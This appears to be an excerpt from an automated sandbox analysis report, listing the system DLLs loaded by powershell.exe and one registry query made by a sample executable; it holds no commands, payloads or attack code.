                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
